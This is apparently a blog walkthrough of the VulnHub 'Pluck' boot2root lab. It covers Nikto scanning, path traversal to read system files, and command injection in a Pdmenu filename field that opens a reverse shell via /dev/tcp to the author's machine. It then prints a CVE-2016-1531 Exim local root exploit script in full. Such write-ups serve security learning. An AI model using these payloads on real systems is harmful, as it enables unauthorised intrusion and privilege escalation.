5 December 2022

Pentesting Fun Stuff

following the cyber security path…

Pluck

Location

https://download.vulnhub.com/pluck/pluck.ova.zip

Description

It’s the first boot2root from @ryanoberto.
Other then ‘enjoy’ there is not much of a description of the VM.

Getting started

Starting with a Sparta scan.

SSH, HTTP, MySQL and LLMNR.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.171.4
+ Target Hostname:    192.168.171.4
+ Target Port:        80
+ Start Time:         2017-03-26 15:56:54 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-03-26 15:58:15 (GMT2) (81 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Several interesting finds with Nikto. I start with the ‘path traversal’ vulnerability and view the ‘/ect/passwd’ file.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

So ‘bob, ‘peter’, ‘paul’ and ‘backup-user’. Both ‘paul’ as ‘backup-user’ has some interesting shells.
When I use the same vulnerability as before I get the content of the ‘backup.sh’ file.

########################
# Server Backup script #
########################
#Backup directories in /backups so we can get it via tftp
echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
echo "Backup complete"

So there is a ‘backup.tar’ file. After downloading the file I extract it to see the content.

tftp> get 192.168.171.4:/backups/backup.tar
Received 1824718 bytes in 10.9 seconds

After examination I got the keys to Paul’s kingdom.
Like most keys…..you need to find the one which fits the lock and after a few tries, the fourth results in this.

                                    Pdmenu
                             ┌─────Main Menu─────┐
                             │ Directory listing │
                             │ Change directory  │
                             │ Edit file         │
                             │ Who's online?     │
                             │ WWW               │
                             │ Telnet            │
                             │ Ping              │
                             │                   │
                             │ Exit              │
                             └───────────────────┘
Welcome to Pdmenu 1.3.4 by Joey Hess <joey@kitenet.net>

Pdmenu‘…..I’ve seen that before. After some toying around I get to the ‘Edit file’ option.
When typing in the name of a file, I can alter that file. But because there is no (or at least poor) input validation, I can concatenate multiple commands.

                                    Pdmenu
                             ┌─────Main Menu─────┐
                             │ Directory listing │
                             │ Change directory  │
                             │ Edit file         │
 ┌─────────────────────────────────filename?──────────────────────────────────┐
 │ admin.php && id                                                            │
 └────────────────────────────────────────────────────────────────────────────┘
                             │ Ping              │
                             │                   │
                             │ Exit              │
                             └───────────────────┘
Press Enter when done, or Esc to cancel
uid=1002(paul) gid=1002(paul) groups=1002(paul)

With this knowledge I use bash to call out to my local machine and create a reverse shell.

                                     Pdmenu
                             ┌─────Main Menu─────┐
                             │ Directory listing │
                             │ Change directory  │
                             │ Edit file         │
 ┌─────────────────────────────────filename?──────────────────────────────────┐
 │ 1 && bash -c "bash -i >& /dev/tcp/192.168.171.3/31337 0>&1"                │
 └────────────────────────────────────────────────────────────────────────────┘
                             │ Ping              │
                             │                   │
                             │ Exit              │
                             └───────────────────┘
Press Enter when done, or Esc to cancel
Listening on [0.0.0.0] (family 0, port 31337)
Connection from 192.168.171.4 38194 received!
paul@pluck:/home/bob$ id
id
uid=1002(paul) gid=1002(paul) groups=1002(paul)

A good way to start enumeration is to check which files has the SUID bit set. Users will get file owner’s permissions as well as owner UID and GID when executing these files. If there’s a vulnerability in the program of these files, I maybe can escalate my privileges.

paul@pluck:/$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

No clue what ‘/exim/’ is, but after some google wisdom I can tell it’s a Mail Transfer Agent. And lucky for me……there is an exploit available.
I create a bash file in ‘/tmp/’ and run it to escalate my privilege.

paul@pluck:/tmp/n13mant$ cat exim.sh
cat exim.sh
VE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
paul@pluck:/tmp/n13mant$./exim.sh
./exim.sh: 1: ./exim.sh: cannot open =: No such file
./exim.sh: 1: ./exim.sh: VE-2016-1531: not found
[ CVE-2016-1531 local root exploit
id
uid=0(root) gid=1002(paul) groups=1002(paul)

Now to get the flag.

cd /root
ls -lah
total 48K
drwx------  2 root root 4.0K Jan 25 13:28 .
drwxr-xr-x 23 root root 4.0K Jan 18 11:14 ..
-rw-------  1 root root    1 Jan 20 08:58 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
-rw-r--r--  1 root root  599 Jan 19 06:07 flag.txt
-rw-------  1 root root   84 Jan 20 09:00 .lesshst
-rw-------  1 root root   81 Jan 18 12:00 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root  11K Jan 25 13:28 .viminfo
-rw-r--r--  1 root root  209 Jan 18 19:40 .wget-hsts
cat flag.txt
Congratulations you found the flag
---------------------------------------
######   ((((((((((((((((((((((((((((((
#########   (((((((((((((((((((((((((((
,,##########   ((((((((((((((((((((((((
@@,,,##########   (((((((((((((((((((((
@@@@@,,,##########
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########
@@@,,,##########   &&&&&&&&&&&&&&&&&&&&
,,,##########   &&&&&&&&&&&&&&&&&&&&&&&
##########   &&&&&&&&&&&&&&&&&&&&&&&&&&
#######   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Conclusion

This was a fun first boot2root form this author. It had some nice features and I can’t wait for the next one. Keep up the good work!!!
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.